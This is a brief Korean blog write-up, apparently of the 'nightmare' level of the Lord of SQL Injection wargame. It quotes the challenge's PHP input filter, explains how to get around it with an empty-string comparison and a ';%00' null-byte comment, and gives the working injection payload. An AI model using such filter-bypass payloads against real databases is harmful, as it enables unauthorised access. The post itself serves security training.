-
LOS - nightmare / level 18Web/SQLI 2024. 7. 9. 20:32
문제
풀이 과정
if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~");
if(strlen($_GET[pw])>6) exit("No Hack ~_~");pw의 값이 다음과 같이 필터링이 걸려있고, 6글자를 초과하면 필터링에 걸림을 알 수 있다
고려사항은 다음과 같다
1. 문자열이 아무것도 없을 시 DB에서 False값으로 받는 것을 이용한다
2. 주석 처리를 하는 #이 필터링이 걸려있으므로 --나 ;%00으로 우회한다
3. 문자열의 길이를 조심할 것
정답
더보기?pw=%27)=0;%00
'Web > SQLI' 카테고리의 다른 글
LOS - xavis / level 19 (0) 2024.07.09 LOS - zombie_assassin / level 17 (0) 2024.07.09 LOS - succubus / level 16 (0) 2024.07.01 LOS - assassin / level 15 (0) 2024.07.01 LOS - giant / level 14 (0) 2024.06.29